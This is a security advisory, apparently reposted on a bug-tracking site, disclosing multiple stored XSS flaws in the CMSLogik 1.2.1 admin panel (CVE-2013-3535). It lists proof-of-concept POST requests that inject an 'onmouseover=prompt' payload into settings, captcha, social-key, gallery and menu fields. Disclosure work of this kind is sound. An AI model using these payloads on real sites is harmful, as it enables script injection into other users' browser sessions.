Bug: CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities ( Ascii Version )

Search:
WLB2

CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities

Published / (Updated)
Credit
Risk
2013-04-14 / 2013-05-17
Gjoko 'LiquidWorm' Krstic
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2013-3535
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities

Vendor: ThemeLogik
Product web page: http://www.themelogik.com/cmslogik
Affected version: 1.2.1 and 1.2.0

Summary: CMSLogik is built on a solid & lightweight framework
called CodeIgniter, and design powered by Bootstrap. This
combination allows for greater security, extensive flexibility,
and ease of use. You can use CMSLogik for almost any niche that
your project might fall into.

Desc: CMSLogik suffers from multiple stored XSS vulnerabilities
when parsing user input to several parameters via POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML
and script code in a user's browser session.

Tested on: Apache/2.2.22
PHP/5.3.15


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2013-5136
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php


05.04.2013

--

===========================================

POST http://localhost/cmslogik/admin/settings HTTP/1.1

admin_email "onmouseover=prompt("XSS1")>
default_level 2
default_page 1
default_url http://themelogik.com/cmslogik/
email_activate 0
header_title "onmouseover=prompt("XSS2")>
login 1
registration 1
site_title "onmouseover=prompt("XSS3")>
update_settings Update Settings
welcome_email 0

===========================================

POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1

captcha_settings Update
recaptcha_private "onmouseover=prompt("XSS4")>
recaptcha_public "onmouseover=prompt("XSS5")>

===========================================

POST http://localhost/cmslogik/admin/social_settings HTTP/1.1

fb_appid "onmouseover=prompt("XSS6")>
fb_secret "onmouseover=prompt("XSS7")>
social_settings Update
tw_consumer_key "onmouseover=prompt("XSS8")>
tw_consumer_secret "onmouseover=prompt("XSS9")>

=========================================

POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1

imgid 76
long test
short test
slug "onmouseover=prompt("XSS10")>
status live
title test

=========================================

POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1

item_link "onmouseover=prompt("XSS11")>
item_name test
item_order 0
mid 9

=========================================

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php
http://www.themelogik.com/cmslogik

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version